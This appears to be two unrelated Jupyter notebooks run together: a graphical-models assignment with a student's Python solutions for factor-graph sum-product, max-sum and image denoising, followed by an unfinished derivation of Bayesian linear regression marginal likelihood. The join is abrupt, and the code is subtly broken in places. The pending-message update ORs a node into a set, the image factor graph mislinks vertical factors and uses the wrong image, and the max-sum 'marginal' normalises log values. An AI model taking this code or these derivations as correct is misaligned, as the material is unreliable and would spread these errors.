np.zeros, np.ones, etc.) as opposed to numpy matrices, because arrays can store n-dimensional arrays whereas matrices only work for 2d arrays. We need n-dimensional arrays in order to store conditional distributions with more than 1 conditioning variable. If you want to perform matrix multiplication on arrays, use the np.dot function; all infix operators including *, +, -, work element-wise on arrays. Part 1: The sum-product algorithmWe will implement a datastructure to store a factor graph and to facilitate computations on this graph. Recall that a factor graph consists of two types of nodes, factors and variables. Below you will find some classes for these node types to get you started. Carefully inspect this code and make sure you understand what it does; you will have to build on it later.%pylab inline import itertools class Node(object): """ Base-class for Nodes in a factor graph. Only instantiate sub-classes of Node. """ def __init__(self, name): # A name for this Node, for printing purposes self.name = name # Neighbours in the graph, identified with their index in this list. # i.e. 
self.neighbours contains neighbour 0 through len(self.neighbours) - 1. self.neighbours = [] # Reset the node-state (not the graph topology) self.reset() def reset(self): # Incoming messages; a dictionary mapping neighbours to messages. # That is, it maps Node -> np.ndarray. self.in_msgs = {} # A set of neighbours for which this node has pending messages. # We use a python set object so we don't have to worry about duplicates. self.pending = set([]) def add_neighbour(self, nb): self.neighbours.append(nb) def send_sp_msg(self, other): # To be implemented in subclass. raise Exception('Method send_sp_msg not implemented in base-class Node') def send_ms_msg(self, other): # To be implemented in subclass. raise Exception('Method send_ms_msg not implemented in base-class Node') def receive_msg(self, other, msg): # Store the incomming message, replacing previous messages from the same node self.in_msgs[other] = msg # add pending messages if all messages have been received for target_node in self.neighbours: if (set(self.neighbours) - {target_node}) <= self.in_msgs.keys(): # if all messages necessary for target has been received self.pending |= target_node def __str__(self): # This is printed when using 'print node_instance' return self.name class Variable(Node): def __init__(self, name, num_states): """ Variable node constructor. Args: name: a name string for this node. Used for printing. num_states: the number of states this variable can take. Allowable states run from 0 through (num_states - 1). For example, for a binary variable num_states=2, and the allowable states are 0, 1. """ self.num_states = num_states # Call the base-class constructor super(Variable, self).__init__(name) def set_observed(self, observed_state): """ Set this variable to an observed state. Args: observed_state: an integer value in [0, self.num_states - 1]. """ # Observed state is represented as a 1-of-N variable # Could be 0.0 for sum-product, but log(0.0) = -inf so a tiny value is preferable for max-sum self.observed_state[:] = 0.000001 self.observed_state[observed_state] = 1.0 def set_latent(self): """ Erase an observed state for this variable and consider it latent again. """ # No state is preferred, so set all entries of observed_state to 1.0 # Using this representation we need not differentiate between observed and latent # variables when sending messages. self.observed_state[:] = 1.0 def reset(self): super(Variable, self).reset() self.observed_state = np.ones(self.num_states) def marginal(self, Z=None): """ Compute the marginal distribution of this Variable. It is assumed that message passing has completed when this function is called. Args: Z: an optional normalization constant can be passed in. If None is passed, Z is computed. Returns: marginal, Z. The first is a numpy array containing the normalized marginal distribution. Z is either equal to the input Z, or computed in this function (if Z=None was passed). """ # compute marginal for factor in self.neighbours: # make sure all necessary messages are in inbox assert factor in self.in_msgs marginal = np.prod(self.in_msgs.values(),axis=0) * self.observed_state if Z is None: Z = marginal.sum() return marginal/Z, Z def marginal_maxsum(self, Z=None): """ Compute the marginal distribution of this Variable. It is assumed that message passing has completed when this function is called. Args: Z: an optional normalization constant can be passed in. If None is passed, Z is computed. Returns: marginal, Z. 
The first is a numpy array containing the normalized marginal distribution. Z is either equal to the input Z, or computed in this function (if Z=None was passed). """ # compute marginal for factor in self.neighbours: # make sure all necessary messages are in inbox assert factor in self.in_msgs marginal = np.sum(self.in_msgs.values(),axis=0) + np.log(self.observed_state) if Z is None: Z = marginal.sum() return marginal/Z, Z def send_sp_msg(self, other): # implement Variable -> Factor message for sum-product for factor in self.neighbours: # make sure all necessary messages are in inbox if factor != other: assert factor in self.in_msgs # Remove other from pending messages self.pending -= {other} other_neighbours = [var for var in self.neighbours if var != other ] if len(other_neighbours) == 0: message = np.ones(self.num_states) else: message = np.prod([self.in_msgs[factor] for factor in other_neighbours], axis = 0) message = message * self.observed_state other.receive_msg(self, message) return message def send_ms_msg(self, other): # implement Variable -> Factor message for max-sum for factor in self.neighbours: # make sure all necessary messages are in inbox if factor != other: assert factor in self.in_msgs other_neighbours = [var for var in self.neighbours if var != other ] if len(other_neighbours) == 0: message = np.zeros(self.num_states) else: message = np.sum([self.in_msgs[factor] for factor in other_neighbours], axis = 0) # Compute message message = message + np.log(self.observed_state) # Remove other from pending messages self.pending -= {other} other.receive_msg(self, message) return message def __str__(self): return "var(%s)" % (self.name) def __repr__(self): return self.__str__() class Factor(Node): def __init__(self, name, f, neighbours): """ Factor node constructor. Args: name: a name string for this node. Used for printing f: a numpy.ndarray with N axes, where N is the number of neighbours. That is, the axes of f correspond to variables, and the index along that axes corresponds to a value of that variable. Each axis of the array should have as many entries as the corresponding neighbour variable has states. neighbours: a list of neighbouring Variables. Bi-directional connections are created. 
""" # Call the base-class constructor super(Factor, self).__init__(name) assert len(neighbours) == f.ndim, 'Factor function f should accept as many arguments as this Factor node has neighbours' for nb_ind in range(len(neighbours)): nb = neighbours[nb_ind] assert f.shape[nb_ind] == nb.num_states, 'The range of the factor function f is invalid for input %i %s' % (nb_ind, nb.name) self.add_neighbour(nb) nb.add_neighbour(self) self.f = f def send_sp_msg(self, other): # Factor -> Variable message for sum-product for var in self.neighbours: # make sure all necessary messages are in inbox if var != other: assert var in self.in_msgs # Indices of neigbour vars except other f_ix = range(len(self.neighbours)) f_ix.remove(self.neighbours.index(other)) # Indices for the corresponding messages m_ix = range(len(f_ix)) # Compute product of other messages other_neighbours = [var for var in self.neighbours if var != other] messages = [self.in_msgs[var] for var in other_neighbours] T = reduce(np.outer, messages) if len(messages) > 0 else 1 #np.array([[1]]) # Compute messages mu_f_x = np.tensordot(self.f, T ,axes=(f_ix,m_ix)) # Remove other from pending self.pending -= {other} # Send message other.receive_msg(self, mu_f_x) return mu_f_x def send_ms_msg(self, other): # implement Factor -> Variable message for max-sum for var in self.neighbours: # make sure all necessary messages are in inbox if var != other: assert var in self.in_msgs # Get received messages other_neighbours = [var for var in self.neighbours if var != other] messages = [self.in_msgs[var] for var in other_neighbours] # indices of neighbors except other f_ix = range(len(self.neighbours)) f_ix.remove(self.neighbours.index(other)) # Expand dimensions to allow T = np.expand_dims(np.add.reduce(np.ix_(*messages)), self.neighbours.index(other)) #if len(messages) > 0 else 0 # find maximum vector along axes mu_f_x = np.apply_over_axes(np.amax, np.log(self.f) + T, f_ix).squeeze() # Remove other from pending self.pending -= {other} # Send message other.receive_msg(self, mu_f_x) return mu_f_x def __str__(self): return "%s" % (self.name) def __repr__(self): return self.__str__()Populating the interactive namespace from numpy and matplotlib1.1 Instantiate network (10 points)Convert the directed graphical model ("Bayesian Network") shown below to a factor graph. Instantiate this graph by creating Variable and Factor instances and linking them according to the graph structure. 
To instantiate the factor graph, first create the Variable nodes and then create Factor nodes, passing a list of neighbour Variables to each Factor.Use the following prior and conditional probabilities.$$p(\verb+Influenza+) = 0.05 \\\\p(\verb+Smokes+) = 0.2 \\\\$$$$p(\verb+SoreThroat+ = 1 | \verb+Influenza+ = 1) = 0.3 \\\\p(\verb+SoreThroat+ = 1 | \verb+Influenza+ = 0) = 0.001 \\\\p(\verb+Fever+ = 1| \verb+Influenza+ = 1) = 0.9 \\\\p(\verb+Fever+ = 1| \verb+Influenza+ = 0) = 0.05 \\\\p(\verb+Bronchitis+ = 1 | \verb+Influenza+ = 1, \verb+Smokes+ = 1) = 0.99 \\\\p(\verb+Bronchitis+ = 1 | \verb+Influenza+ = 1, \verb+Smokes+ = 0) = 0.9 \\\\p(\verb+Bronchitis+ = 1 | \verb+Influenza+ = 0, \verb+Smokes+ = 1) = 0.7 \\\\p(\verb+Bronchitis+ = 1 | \verb+Influenza+ = 0, \verb+Smokes+ = 0) = 0.0001 \\\\p(\verb+Coughing+ = 1| \verb+Bronchitis+ = 1) = 0.8 \\\\p(\verb+Coughing+ = 1| \verb+Bronchitis+ = 0) = 0.07 \\\\p(\verb+Wheezing+ = 1| \verb+Bronchitis+ = 1) = 0.6 \\\\p(\verb+Wheezing+ = 1| \verb+Bronchitis+ = 0) = 0.001 \\\\$$from IPython.core.display import Image Image(filename='bn.png') # Initialization names = ['influenza', 'smokes', 'sorethroat', 'fever' , 'bronchitis', 'coughing', 'wheezing'] num_states = 2 num_vars = len(names) num_factors = 7 # Factor-variable connectivity matrix connectivity = [ [1,0,0,0,0,0,0], # f1(influenza) [0,1,0,0,0,0,0], # f2(smokes) [1,0,1,0,0,0,0], # f3(influenza, sorethroat) [1,0,0,1,0,0,0], # f4(influenze, fever) [1,1,0,0,1,0,0], # f5(influenza, smokes, bronchitis) [0,0,0,0,1,1,0], # f6(bronchitis,coughing) [0,0,0,0,1,0,1]] # f7(bronchitis, wheezing) factor_matrix = np.array(connectivity) # Variables: {id:Variable} dict_vars = {var_idx: Variable(name,num_states) for var_idx, name in enumerate(names)} # Factor functions _f1 = lambda x: 0.05 * x + 0.95 * (1 - x) _f2 = lambda x: 0.2 * x + 0.8 * (1 - x) _f3 = lambda x, y: 0.3 * x * y + 0.7 * x *(1-y) + 0.001 * (1-x) * y + 0.999 * (1-x) * (1-y) _f4 = lambda x, y: 0.9 * x * y + 0.1 * x *(1-y) + 0.05 * (1-x) * y + 0.95 * (1-x) * (1-y) _f5 = lambda x, y, z: 0.99 * x * y * z + 0.01 * x * y * (1-z) + \ 0.9 * x * (1-y) * z + 0.1 * x * (1-y) * (1-z) + \ 0.7 * (1-x) * y * z + 0.3 * (1-x) * y * (1-z) + \ 0.0001 * (1-x) * (1-y) * z + 0.9999 * (1-x) * (1-y) * (1-z) _f6 = lambda x, y: 0.8 * x * y + 0.2 * x *(1-y) + 0.07 * (1-x) * y + 0.93 * (1-x) * (1-y) _f7 = lambda x, y: 0.6 * x * y + 0.4 * x *(1-y) + 0.001 * (1-x) * y + 0.999 * (1-x) * (1-y) ls_factor_fns = [_f1, _f2, _f3, _f4, _f5, _f6, _f7] # Create tensors for each factor and assigns correct probability def get_factor_beliefs_tensor(f, neighbours): assignments = list(itertools.product(*[list(range(var.num_states)) for var in neighbours])) beliefs = np.zeros(tuple(var.num_states for var in neighbours)) for assignment in assignments: # assign values to tensors beliefs[assignment] = f(*assignment) return beliefs # Create factors ls_factors = [] for f_idx, row in enumerate(factor_matrix): name = 'f%d' % (f_idx+1) neighbours = [dict_vars[var_idx] for var_idx in np.where(row == 1)[0]] f = get_factor_beliefs_tensor(ls_factor_fns[f_idx], neighbours) ls_factors.append(Factor(name=name, f=f, neighbours=neighbours)) f1 = ls_factors[0] f2 = ls_factors[1] f3 = ls_factors[2] f4 = ls_factors[3] f5 = ls_factors[4] f6 = ls_factors[5] f7 = ls_factors[6] I = dict_vars[0] SM = dict_vars[1] ST = dict_vars[2] F = dict_vars[3] B = dict_vars[4] C = dict_vars[5] W = dict_vars[6]1.2 Factor to variable messages (20 points)Write a method `send_sp_msg(self, other)` for the Factor class, that checks if all 
the information required to pass a message to Variable `other` is present, computes the message and sends it to `other`. "Sending" here simply means calling the `receive_msg` function of the receiving node (we will implement this later). The message itself should be represented as a numpy array (np.array) whose length is equal to the number of states of the variable.An elegant and efficient solution can be obtained using the n-way outer product of vectors. This product takes n vectors $\mathbf{x}^{(1)}, \ldots, \mathbf{x}^{(n)}$ and computes a $n$-dimensional tensor (ndarray) whose element $i_0,i_1,...,i_n$ is given by $\prod_j \mathbf{x}^{(j)}_{i_j}$. In python, this is realized as `np.multiply.reduce(np.ix_(*vectors))` for a python list `vectors` of 1D numpy arrays. Try to figure out how this statement works -- it contains some useful functional programming techniques. Another function that you may find useful in computing the message is `np.tensordot`.# See class definition for this and the following questions1.3 Variable to factor messages (10 points)Write a method `send_sp_message(self, other)` for the Variable class, that checks if all the information required to pass a message to Variable var is present, computes the message and sends it to factor. 1.4 Compute marginal (10 points)Later in this assignment, we will implement message passing schemes to do inference. Once the message passing has completed, we will want to compute local marginals for each variable.Write the method `marginal` for the Variable class, that computes a marginal distribution over that node. 1.5 Receiving messages (10 points)In order to implement the loopy and non-loopy message passing algorithms, we need some way to determine which nodes are ready to send messages to which neighbours. To do this in a way that works for both loopy and non-loopy algorithms, we make use of the concept of "pending messages", which is explained in Bishop (8.4.7): "we will say that a (variable or factor)node a has a message pending on its link to a node b if node a has received anymessage on any of its other links since the last time it send (sic) a message to b. Thus,when a node receives a message on one of its links, this creates pending messageson all of its other links."Keep in mind that for the non-loopy algorithm, nodes may not have received any messages on some or all of their links. Therefore, before we say node a has a pending message for node b, we must check that node a has received all messages needed to compute the message that is to be sent to b.Modify the function `receive_msg`, so that it updates the self.pending variable as described above. The member self.pending is a set that is to be filled with Nodes to which self has pending messages. Modify the `send_msg` functions to remove pending messages as they are sent. 1.6 Inference Engine (10 points)Write a function `sum_product(node_list)` that runs the sum-product message passing algorithm on a tree-structured factor graph with given nodes. The input parameter `node_list` is a list of all Node instances in the graph, which is assumed to be ordered correctly. That is, the list starts with a leaf node, which can always send a message. Subsequent nodes in `node_list` should be capable of sending a message when the pending messages of preceding nodes in the list have been sent. The sum-product algorithm then proceeds by passing over the list from beginning to end, sending all pending messages at the nodes it encounters. 
Then, in reverse order, the algorithm traverses the list again and again sends all pending messages at each node as it is encountered. For this to work, you must initialize pending messages for all the leaf nodes, e.g. `influenza_prior.pending.add(influenza)`, where `influenza_prior` is a Factor node corresponding the the prior, `influenza` is a Variable node and the only connection of `influenza_prior` goes to `influenza`.# Define tree tree = [f1, f2, ST, F, C, f3, f4, I, SM, f5, f6, B, f7, W] # Define leaves leaves = [f1, f2, ST, F, C] def sum_product(node_list, leaves): # Initialization for node in leaves: for neighbour in node.neighbours: node.pending.add(neighbour) # forward pass print('\n\nForward Pass') for i, node in enumerate(node_list): for neighbour in (set(node.neighbours) & set(node_list[i:])): # send messages message = node.send_sp_msg(neighbour) print('%s -> %s, \tmessage: %s' % (node.name, neighbour.name, message)) print('\n\nBackward Pass') # backward pass reverse_ls = node_list[::-1] for i, node in enumerate(reverse_ls): for neighbour in (set(node.neighbours) & set(reverse_ls[i:])): message = node.send_sp_msg(neighbour) print('%s -> %s, \tmessage: %s' % (node.name, neighbour.name, message)) sum_product(tree, leaves) # Compute Marginals for _, node in dict_vars.items(): print(node, node.marginal())(var(influenza), (array([ 0.95, 0.05]), 1.0)) (var(smokes), (array([ 0.8, 0.2]), 1.0)) (var(sorethroat), (array([ 0.98405, 0.01595]), 1.0)) (var(fever), (array([ 0.9075, 0.0925]), 1.0)) (var(bronchitis), (array([ 0.821024, 0.178976]), 1.0)) (var(coughing), (array([ 0.79934752, 0.20065248]), 1.0)) (var(wheezing), (array([ 0.89179338, 0.10820662]), 1.0))1.7 Observed variables and probabilistic queries (15 points)We will now use the inference engine to answer probabilistic queries. That is, we will set certain variables to observed values, and obtain the marginals over latent variables. We have already provided functions `set_observed` and `set_latent` that manage a member of Variable called `observed_state`. Modify the `Variable.send_msg` and `Variable.marginal` routines that you wrote before, to use `observed_state` so as to get the required marginals when some nodes are observed. 1.8 Sum-product and MAP states (5 points)A maximum a posteriori state (MAP-state) is an assignment of all latent variables that maximizes the probability of latent variables given observed variables:$$\mathbf{x}_{\verb+MAP+} = \arg\max _{\mathbf{x}} p(\mathbf{x} | \mathbf{y})$$Could we use the sum-product algorithm to obtain a MAP state? If yes, how? If no, why not? Solution Yes, it is possible to use the sum-product algorithm to compute $p(\mathbf{x} | \mathbf{y})$. We can then evaluate each possible combination of values for $\mathbf{x}$ and select the one with maximum a posteriori probability. Note that this is highly inefficient, which is why we use the max-sum algorithm. Part 2: The max-sum algorithmNext, we implement the max-sum algorithm as described in section 8.4.5 of Bishop. 2.1 Factor to variable messages (10 points)Implement the function `Factor.send_ms_msg` that sends Factor -> Variable messages for the max-sum algorithm. It is analogous to the `Factor.send_sp_msg` function you implemented before. 2.2 Variable to factor messages (10 points)Implement the `Variable.send_ms_msg` function that sends Variable -> Factor messages for the max-sum algorithm. 2.3 Find a MAP state (10 points)Using the same message passing schedule we used for sum-product, implement the max-sum algorithm. 
For simplicity, we will ignore issues relating to non-unique maxima. So there is no need to implement backtracking; the MAP state is obtained by a per-node maximization (eq. 8.98 in Bishop). Make sure your algorithm works with both latent and observed variables.def max_sum(node_list, leaves): # Initialization for node in leaves: for neighbour in node.neighbours: node.pending.add(neighbour) # forward pass print('\nForward Pass') for i, node in enumerate(node_list): for neighbour in (set(node.neighbours) & set(node_list[i:])): # send messages message = node.send_ms_msg(neighbour) print('%s -> %s, \tmessage: %s' % (node.name, neighbour.name, np.exp(message))) print('\nBackward Pass') # backward pass reverse_ls = node_list[::-1] for i, node in enumerate(reverse_ls): for neighbour in (set(node.neighbours) & set(reverse_ls[i:])): message = node.send_ms_msg(neighbour) print('%s -> %s, \tmessage: %s' % (node.name, neighbour.name, np.exp(message))) def get_map_state(node): return np.argmax(np.sum(node.in_msgs.values(), axis=0) + np.log(node.observed_state)) # Define tree tree = [f1, f2, ST, F, C, f3, f4, I, SM, f5, f6, B, f7, W] # Define leaves leaves = [f1, f2, ST, F, C] # Define observed states B.set_observed(1) # I.set_observed(1) # Run algorithm max_sum(tree, leaves) # Compute MAP states print('\nMAP states') for _, node in dict_vars.items(): print('%s, MAP: %d, \tmarginal: %s' % (node.name, get_map_state(node), node.marginal()[0]))Forward Pass f1 -> influenza, message: [ 0.95 0.05] f2 -> smokes, message: [ 0.8 0.2] sorethroat -> f3, message: [ 1. 1.] fever -> f4, message: [ 1. 1.] coughing -> f6, message: [ 1. 1.] f3 -> influenza, message: [ 0.999 0.7 ] f4 -> influenza, message: [ 0.95 0.9 ] influenza -> f5, message: [ 0.9015975 0.0315 ] smokes -> f5, message: [ 0.8 0.2] f5 -> bronchitis, message: [ 0.72120587 0.12622365] f6 -> bronchitis, message: [ 0.93 0.8 ] bronchitis -> f7, message: [ 6.70721461e-07 1.00978920e-01] f7 -> wheezing, message: [ 0.04039157 0.06058735] Backward Pass wheezing -> f7, message: [ 1. 1.] f7 -> bronchitis, message: [ 0.999 0.6 ] bronchitis -> f5, message: [ 9.29070000e-07 4.80000000e-01] bronchitis -> f6, message: [ 7.20484666e-07 7.57341900e-02] f6 -> coughing, message: [ 0.01514684 0.06058735] f5 -> influenza, message: [ 0.0672 0.3456] f5 -> smokes, message: [ 0.013608 0[...]Part 3: Image Denoising and Loopy BPNext, we will use a loopy version of max-sum to perform denoising on a binary image. The model itself is discussed in Bishop 8.3.3, but we will use loopy max-sum instead of Iterative Conditional Modes as Bishop does.The following code creates some toy data: `im` is a quite large binary image and `test_im` is a smaller synthetic binary image. Noisy versions are also provided.from pylab import imread, gray # Load the image and binarize im = np.mean(imread('dalmatian1.png'), axis=2) > 0.5 imshow(im) gray() # Add some noise noise = np.random.rand(*im.shape) > 0.9 noise_im = np.logical_xor(noise, im) figure() imshow(noise_im) test_im = np.zeros((10,10)) #test_im[5:8, 3:8] = 1.0 #test_im[5,5] = 1.0 figure() imshow(test_im) # Add some noise noise = np.random.rand(*test_im.shape) > 0.9 noise_test_im = np.logical_xor(noise, test_im) figure() imshow(noise_test_im)3.1 Construct factor graph (10 points)Convert the Markov Random Field (Bishop, fig. 
8.31) to a factor graph and instantiate it.from itertools import product # Define factor graph def image_factor_graph(im): # Observed variables im_x, im_y = im.shape observed = [[Variable('o-%d-%d'%(i,j),2 ) for i in range(im_y)] for j in range(im_x)] for i in range(im_x): for j in range(im_y): observed[i][j].set_observed(int(test_im[i,j])) # latent variables latent = [[Variable('l-%d-%d'%(i,j),2) for i in range(im_x)] for j in range(im_y)] # factors f = np.array([[0.9, 0.1],[0.1, 0.9]]) # X-Y factor factor_xy = [Factor('fxy-%d-%d'%(i,j), f, [observed[x][y], latent[x][y]]) for x,y in product(range(im_x), range(im_y))] # X-X horizontal factor_xh = [Factor('fxh-%d-%d'%(i,j), f, [latent[x][y], latent[x+1][y]]) for x,y in product(range(im_x-1), range(im_y))] # X-X vertical factor_xv = [Factor('fxv-%d-%d'%(i,j), f, [observed[x][y], latent[x][y+1]]) for x,y in product(range(im_x), range(im_y-1))] return observed, latent, factor_xy, factor_xh, factor_xv observed, latent, factor_xy, factor_xh, factor_xv = image_factor_graph(test_im)Marginal likelihood for Bayesian linear regressionAuthor: [](https://patel-zeel.github.io/), [](https://nipunbatra.github.io/) Bayesian linear regression is defined as below,\begin{align}\mathbf{y} &= X\boldsymbol{\theta} + \epsilon\\\epsilon &\sim \mathcal{N}(0, \sigma_n^2)\\\theta &\sim \mathcal{N}(\mathbf{m}_0, S_0)\end{align}For a Gaussian random variable $\mathbf{z} \sim \mathcal{N}(\boldsymbol{\mu}, \Sigma)$, $A\mathbf{z} + \mathbf{b}$ is also a Gaussian random variable.\begin{align}\mathbf{y} = X\mathbf{\theta} + \boldsymbol{\epsilon} &\sim \mathcal{N}(\boldsymbol{\mu}', \Sigma')\\\boldsymbol{\mu}' &= \mathbb{E}_{\theta, \epsilon}(X\mathbf{\theta}+\boldsymbol{\epsilon})\\ &= X\mathbb{E}(\mathbf{\theta}) + \mathbb{E}(\mathbf{\epsilon})\\ &= X\mathbf{m}_0\\ \\\Sigma' &= V(X\mathbf{\theta}+\boldsymbol{\epsilon})\\ &= XV(\mathbf{\theta})X^T+V(\boldsymbol{\epsilon})\\ &= XS_0X^T + \sigma_n^2I\end{align}Marginal likelihood is $p(\mathbf{y})$ so,\begin{align}p(\mathbf{y}) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma'|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{y}-\boldsymbol{\mu}')^T\Sigma'^{-1}(\mathbf{y}-\boldsymbol{\mu}')\right]\\ &= \frac{1}{(2\pi)^{\frac{N}{2}}|XS_0X^T + \sigma_n^2I|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{y}-X\mathbf{m}_0)^T(XS_0X^T + \sigma_n^2I)^{-1}(\mathbf{y}-X\mathbf{m}_0)\right]\end{align} Multiplication of two Gaussians (work in progress)We need Gaussian pdf over same variables to evaluate their multiplication. Let us convert $y$ into $\theta$. \begin{align}\mathbf{y} &= X\theta + \boldsymbol{\epsilon}\\\theta &= (X^TX)^{-1}X^T(\mathbf{y} - \boldsymbol{\epsilon})\\\text{Deriving mean and covariance of }\theta\\E(\theta) &= (X^TX)^{-1}X^T\mathbf{y}\\V(\theta) &= \sigma_n^2\left[(X^TX)^{-1}X^T\right]\left[(X^TX)^{-1}X^T\right]^T\\ &= \sigma_n^2(X^TX)^{-1}X^TX(X^TX)^{-1}\\ &= \sigma_n^2(X^TX)^{-1} \end{align}Now, we have both $p(\mathbf{y}|\boldsymbol{\theta})$ and $p(\boldsymbol{\theta})$ in terms of $\boldsymbol{\theta}$. We can apply the rules from 6.5.2 of MML book. Writing our results in terminology of 6.5.2. 
\begin{align}\mathcal{N}(x|a, A) &== \mathcal{N}(\theta|(X^TX)^{-1}X^T\mathbf{y}, \sigma_n^2(X^TX)^{-1})\\\mathcal{N}(x|b, B) &== \mathcal{N}(\theta|\mathbf{m}_0, S_0)\end{align}we know that,$$c\mathcal{N}(\theta|\mathbf{c}, C) = \mathcal{N}(x|a, A)\mathcal{N}(x|b, B)\\\mathcal{N}(\theta|\mathbf{c}, C) = \frac{\mathcal{N}(x|a, A)\mathcal{N}(x|b, B)}{c}$$In the Bayesian setting,\begin{align}Prior &\sim \mathcal{N}(x|b, B) == \mathcal{N}(\theta|\mathbf{m}_0, S_0)\\Likelihood &\sim \mathcal{N}(x|a, A) == \mathcal{N}(\theta|(X^TX)^{-1}X^T\mathbf{y}, \sigma_n^2(X^TX)^{-1})\\Posterior &\sim \mathcal{N}(\theta|\mathbf{c}, C) == \mathcal{N}(\theta|\mathbf{m}_n, S_n)\\\text{last but not the least}\\Marginal\;likelihood &\sim c == \mathcal{N}(\mathbf{y}|\boldsymbol{\mu}, \Sigma)\end{align}Let us evaluate the posterior,\begin{align}Posterior &\sim \mathcal{N}(\theta|\mathbf{c}, C)\\S_n = C &= (A^{-1} + B^{-1})^{-1}\\ &= \left(\frac{X^TX}{\sigma_n^2} + S_0^{-1}\right)^{-1}\\\mathbf{m_n} = \mathbf{c} &= C(A^{-1}a + B^{-1}b)\\ &= S_n\left(\frac{X^TX}{\sigma_n^2}(X^TX)^{-1}X^T\mathbf{y} + S_0^{-1}\mathbf{m}_0\right)\\ &= S_n\left(\frac{X^T\mathbf{y}}{\sigma_n^2} + S_0^{-1}\mathbf{m}_0\right)\end{align}Now, we evaluate the marginal likelihood,\begin{align}c &= \mathcal{N}(\mathbf{y}|\boldsymbol{\mu}, \Sigma)\\ &= (2\pi)^{-\frac{D}{2}}|A+B|^{-\frac{1}{2}}\exp\left(-\frac{1}{2}(a-b)^T(A+B)^{-1}(a-b)\right)\\ &= (2\pi)^{-\frac{D}{2}}|\sigma_n^2(X^TX)^{-1}+S_0|^{-\frac{1}{2}}\exp\left(-\frac{1}{2}((X^TX)^{-1}X^T\mathbf{y}-\mathbf{m}_0)^T(\sigma_n^2(X^TX)^{-1}+S_0)^{-1}((X^TX)^{-1}X^T\mathbf{y}-\mathbf{m}_0)\right)\end{align}Another well-known formulation of marginal likelihood is the following,$$p(\mathbf{y}) \sim \mathcal{N}(X\mathbf{m}_0, XS_0X^T + \sigma_n^2I)$$Let us verify if both are the same, empirically,import numpy as np import scipy.stats np.random.seed(0) def ML1(X, y, m0, S0, sigma_n): N = len(y) return scipy.stats.multivariate_normal.pdf(y.ravel(), (X@m0).squeeze(), X@S0@X.T + np.eye(N)*sigma_n**2) def ML2(X, y, m0, S0, sigma_n): D = len(m0) a = np.linalg.inv(X.T@X)@X.T@y b = m0 A = np.linalg.inv(X.T@X)*sigma_n**2 B = S0 return scipy.stats.multivariate_normal.pdf(a.ravel(), b.ravel(), A+B) def ML3(X, y, m0, S0, sigma_n): N = len(y) Sn = np.linalg.inv((X.T@X)/(sigma_n**2) + np.linalg.inv(S0)) Mn = Sn@((X.T@y)/(sigma_n**2) + np.linalg.inv(S0)@m0) LML = -0.5*N*np.log(2*np.pi) - 0.5*N*np.log(sigma_n**2) - 0.5*np.log(np.linalg.det(S0)/np.linalg.det(Sn)) - 0.5*(y.T@y)/sigma_n**2 + 0.5*(Mn.T@np.linalg.inv(Sn)@Mn) return np.exp(LML) X = np.random.rand(10,2) m0 = np.random.rand(2,1) s0 = np.random.rand(2,2) S0 = s0@s0.T sigma_n = 10 y = np.random.rand(10,1) ML1(X, y, m0, S0, sigma_n), ML2(X, y, m0, S0, sigma_n), ML3(X, y, m0, S0, sigma_n)Products of Gaussian PDFs (Work under progress) Product of two Gaussians $\mathbf{x} \sim \mathcal{N}(\boldsymbol{\mu}_0, \Sigma_0)$ and $\mathbf{x} \sim \mathcal{N}(\boldsymbol{\mu}_1, \Sigma_1)$ is an unnormalized Gaussian. 
\begin{align}f(\mathbf{x}) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu}_0)^T\Sigma_0^{-1}(\mathbf{x}-\boldsymbol{\mu}_0)\right]\\g(\mathbf{x}) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_1|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu}_1)^T\Sigma_1^{-1}(\mathbf{x}-\boldsymbol{\mu}_1)\right]\\\int h(x) = \frac{1}{c}\int f(\mathbf{x})g(\mathbf{x})d\mathbf{x} &= 1\end{align}We need to find figure out value of $c$ to solve the integration.\begin{align}h(x) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu})^T\Sigma^{-1}(\mathbf{x}-\boldsymbol{\mu})\right] = \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}\left(\mathbf{x}^T\Sigma^{-1}\mathbf{x} - 2\boldsymbol{\mu}^T\Sigma^{-1}\mathbf{x} + \boldsymbol{\mu}^T\Sigma^{-1}\boldsymbol{\mu}\right)\right]\\ f(x)g(x) &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}(2\pi)^{\frac{N}{2}}|\Sigma_1|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu}_0)^T\Sigma_0^{-1}(\mathbf{x}-\boldsymbol{\mu}_0) -\frac{1}{2}(\mathbf{x}-\boldsymbol{\mu}_1)^T\Sigma_1^{-1}(\mathbf{x}-\boldsymbol{\mu}_1)\right]\\ &= \frac{1}{(2\pi)^{\frac{N}{2}}|\Sigma_0|^{\frac{1}{2}}(2\pi)^{\frac{N}{2}}|\Sigma_1|^{\frac{1}{2}}}\exp\left[-\frac{1}{2}\left(\mathbf{x}^T(\Sigma_0^{-1}+\Sigma_1^{-1})\mathbf{x}- 2\boldsymbol{\mu}^T(\Sigma_0^{-1}+\Sigma_1^{-1})\mathbf{x} + \boldsymbol{\mu}^T(\Sigma_0^{-1}+\Sigma_1^{-1})\boldsymbol{\mu}\right)\right]\\\end{align} We can compare the exponent terms directly. We get the following results by doing that\begin{align}\Sigma^{-1} &= \Sigma_0^{-1} + \Sigma_1^{-1}\\\Sigma &= \left(\Sigma_0^{-1} + \Sigma_1^{-1}\right)^{-1}\\\\\boldsymbol{\mu}^T\Sigma^{-1}\mathbf{x} &= \boldsymbol{\mu_0}^T\Sigma_0^{-1}\mathbf{x} + \boldsymbol{\mu_1}^T\Sigma_1^{-1}\mathbf{x}\\\left(\boldsymbol{\mu}^T\Sigma^{-1}\right)\mathbf{x} &= \left(\boldsymbol{\mu_0}^T\Sigma_0^{-1} + \boldsymbol{\mu_1}^T\Sigma_1^{-1}\right)\mathbf{x}\\\boldsymbol{\mu}^T\Sigma^{-1} &= 